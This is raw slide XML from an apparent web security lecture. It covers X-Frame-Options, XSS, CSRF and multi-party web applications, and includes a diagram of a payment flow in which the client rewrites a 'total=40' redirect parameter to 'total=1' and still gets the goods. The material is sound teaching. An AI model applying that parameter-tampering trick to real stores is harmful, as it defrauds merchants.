            <a:off x="304920" y="228600"/>
            <a:ext cx="8343360" cy="43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mbria"/>
              </a:rPr>
              <a:t>X-Frame-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1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Cambria"/>
              </a:rPr>
              <a:t>Header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05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400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>DENY</a:t>
            </a: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: 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	The page cannot be embedded in a frame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lang="en-US" sz="1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400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>SAMEORIGIN: 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400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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The page can only be framed on a page with the same 	domain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lang="en-US" sz="1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400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>ALLOW-FROM origin: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2400" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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The page can only be framed on a page with a specific 	other domain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119" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="3943440"/>
            <a:ext cx="2819160" cy="251424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ambria"/>
              </a:rPr>
              <a:t>Can limit flexibility and might not work on older browsers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34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Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-lt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 sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRP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Cross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Site Scripting (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XSS)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Injection Attacks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Cross Site Request Forgery (CSRF)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charset="-122"/>
              </a:rPr>
              <a:t>Multi-Party Web Applications</a:t>
            </a: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Web Security Issues</a:t>
            </a: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Continue assignment…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37893" name="Picture 5" descr="&#10;prodsec04.jpg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66875" cy="17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2548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title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442080" y="1828800"/>
            <a:ext cx="6950880" cy="1308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Multi-Party Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1121" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2871000"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1122" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3323880" y="3137760"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1123" name="Straight Arrow Connector 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019240" y="3401640"/>
            <a:ext cx="799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4" name="Straight Arrow Connector 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2019240" y="3768120"/>
            <a:ext cx="799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125" name="Picture 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514760" y="4279680"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Straight Arrow Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5734080" y="3402720"/>
            <a:ext cx="799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7" name="Straight Arrow Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5734080" y="3768120"/>
            <a:ext cx="799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128" name="Picture 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7611120" y="4344840"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1129" name="Picture 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213200" y="4384080"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1130" name="Picture 15"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6969600" y="2871000"/>
            <a:ext cx="1239840" cy="17852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6289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Rounded Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625480" y="1447920"/>
            <a:ext cx="3929760" cy="112860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132" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="981000" y="1291320"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1133" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498840" y="4508640"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1134" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6940440" y="1291320"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Straight Arrow Connector 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1814400" y="3501000"/>
            <a:ext cx="1218960" cy="11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36" name="Straight Arrow Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2289600" y="3077280"/>
            <a:ext cx="1218960" cy="11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37" name="Straight Arrow Connector 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5263920" y="3076920"/>
            <a:ext cx="1218960" cy="11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38" name="Straight Arrow Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="5712840" y="3539520"/>
            <a:ext cx="1218960" cy="11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39" name="Straight Arrow Connector 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2913120" y="1768680"/>
            <a:ext cx="3344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40" name="Straight Arrow Connector 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2912400" y="2282040"/>
            <a:ext cx="3344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41" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970920" y="636480"/>
            <a:ext cx="14187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mbria"/>
              </a:rPr>
              <a:t>Party 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42" name="TextBox 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6874200" y="636480"/>
            <a:ext cx="14400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mbria"/>
              </a:rPr>
              <a:t>Party B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43" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3857040" y="5637600"/>
            <a:ext cx="12085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mbria"/>
              </a:rPr>
              <a:t>Client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144" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194760" y="4876920"/>
            <a:ext cx="2971440" cy="175212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ambria"/>
              </a:rPr>
              <a:t>Same-origin policy won’t stop parties from communicating directly to share information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5" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5984640" y="4876920"/>
            <a:ext cx="2971440" cy="175212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ambria"/>
              </a:rPr>
              <a:t>This can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>good: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ambria"/>
              </a:rPr>
              <a:t>Single Sign-On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ambria"/>
              </a:rPr>
              <a:t>Multiparty E-Commerce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1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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="838200"/>
            <a:ext cx="8229240" cy="4754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sz="3200" b="0" i="1" u="sng" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill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Cross site scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99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the ability to get a website to display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" u="sng" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill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user-supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-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content laced with malicious HTML/JavaScript” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-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XSS</a:t>
            </a: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attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="32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8920" y="4648200"/>
            <a:ext cx="8305800" cy="156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Unlike other attacks, this technique does not target the web server itself, but the user's browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17010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Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579240" y="838080"/>
            <a:ext cx="7924320" cy="297144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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Disclaimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>: The exact details of the following protocols may not be 100% correct (i.e. Facebook might use a slightly different implementation than presented here). Our goal is to get a feel for how these systems work.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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838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Multi-Party E-Commerce Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1149" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="1569240"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4648320"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1151" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6559200" y="1567080"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4015440" y="5777280"/>
            <a:ext cx="12085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mbria"/>
              </a:rPr>
              <a:t>Client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153" name="Picture 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403760" y="2882880"/>
            <a:ext cx="1359000" cy="46944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154" name="Picture 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866960" y="2748960"/>
            <a:ext cx="2133360" cy="7372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155" name="Straight Arrow Connector 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1597680" y="3605400"/>
            <a:ext cx="1861200" cy="197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6" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305800" y="3767040"/>
            <a:ext cx="2500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I’d like the $40 Vest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57" name="Straight Arrow Connector 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003400" y="3616560"/>
            <a:ext cx="1577520" cy="1585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8" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579240" y="4360680"/>
            <a:ext cx="206712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Redirect to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paypal.com/pay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?id=123&amp;total=40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59" name="Straight Arrow Connector 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5560200" y="3485880"/>
            <a:ext cx="840240" cy="101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0" name="TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925960" y="3756240"/>
            <a:ext cx="2851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/pay?id=123&amp;total=40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61" name="Straight Arrow Connector 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5712480" y="3638160"/>
            <a:ext cx="840240" cy="101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2" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5864760" y="3790800"/>
            <a:ext cx="840240" cy="101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3" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142680" y="4299120"/>
            <a:ext cx="1877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Here’s my $40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64" name="Straight Arrow Connector 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6017400" y="3943080"/>
            <a:ext cx="840240" cy="101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5" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6278400" y="4655160"/>
            <a:ext cx="702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Cool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66" name="Straight Arrow Connector 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528280" y="2057400"/>
            <a:ext cx="3598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7" name="TextBox 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999880" y="1665000"/>
            <a:ext cx="2922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Order 123 is completed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68" name="Straight Arrow Connector 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1389240" y="3723840"/>
            <a:ext cx="1861200" cy="197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9" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221760" y="4360680"/>
            <a:ext cx="1778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Shipping you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your vest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70" name="Picture 39"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5390280" y="5456880"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6145200" y="3974400"/>
            <a:ext cx="16336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Give me $40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72" name="TextBox 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35640" y="6180480"/>
            <a:ext cx="4151520" cy="81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ambria"/>
              </a:rPr>
              <a:t>Wang, Rui, et al. "How to shop for free online--Security analysis of cashier-as-a-service based Web stores." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Security and Privacy (SP), 2011 IEEE Symposium on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>. IEEE, 2011.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693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Multi-Party E-Commerce Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="977760" y="1569240"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1175" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4648320"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1176" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6559200" y="1567080"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4015440" y="5777280"/>
            <a:ext cx="12085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mbria"/>
              </a:rPr>
              <a:t>Client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178" name="Picture 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403760" y="2882880"/>
            <a:ext cx="1359000" cy="46944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179" name="Picture 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866960" y="2748960"/>
            <a:ext cx="2133360" cy="7372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180" name="Straight Arrow Connector 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1597680" y="3605400"/>
            <a:ext cx="1861200" cy="197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1" name="TextBox 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305800" y="3767040"/>
            <a:ext cx="2500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I’d like the $40 Vest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2" name="Straight Arrow Connector 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003400" y="3616560"/>
            <a:ext cx="1577520" cy="1585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3" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579240" y="4360680"/>
            <a:ext cx="206712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Redirect to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paypal.com/pay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?id=123&amp;total=40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4" name="Straight Arrow Connector 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5560200" y="3485880"/>
            <a:ext cx="840240" cy="101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5" name="TextBox 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5921280" y="3756240"/>
            <a:ext cx="2788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/pay?id=123&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>total=1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6" name="Straight Arrow Connector 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5712480" y="3638160"/>
            <a:ext cx="840240" cy="101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7" name="Straight Arrow Connector 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5864760" y="3790800"/>
            <a:ext cx="840240" cy="101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8" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150960" y="4299120"/>
            <a:ext cx="17326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Here’s my $1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9" name="Straight Arrow Connector 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6017400" y="3943080"/>
            <a:ext cx="840240" cy="101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0" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6278400" y="4655160"/>
            <a:ext cx="702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Cool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1" name="Straight Arrow Connector 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528280" y="2057400"/>
            <a:ext cx="3598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2" name="TextBox 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999880" y="1665000"/>
            <a:ext cx="2922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Order 123 is completed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3" name="Straight Arrow Connector 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1389240" y="3723840"/>
            <a:ext cx="1861200" cy="197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4" name="TextBox 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221760" y="4360680"/>
            <a:ext cx="1778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Shipping you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your vest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5" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153840" y="3974400"/>
            <a:ext cx="1488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Give me $1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96" name="Picture 27"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5370840" y="5459040"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
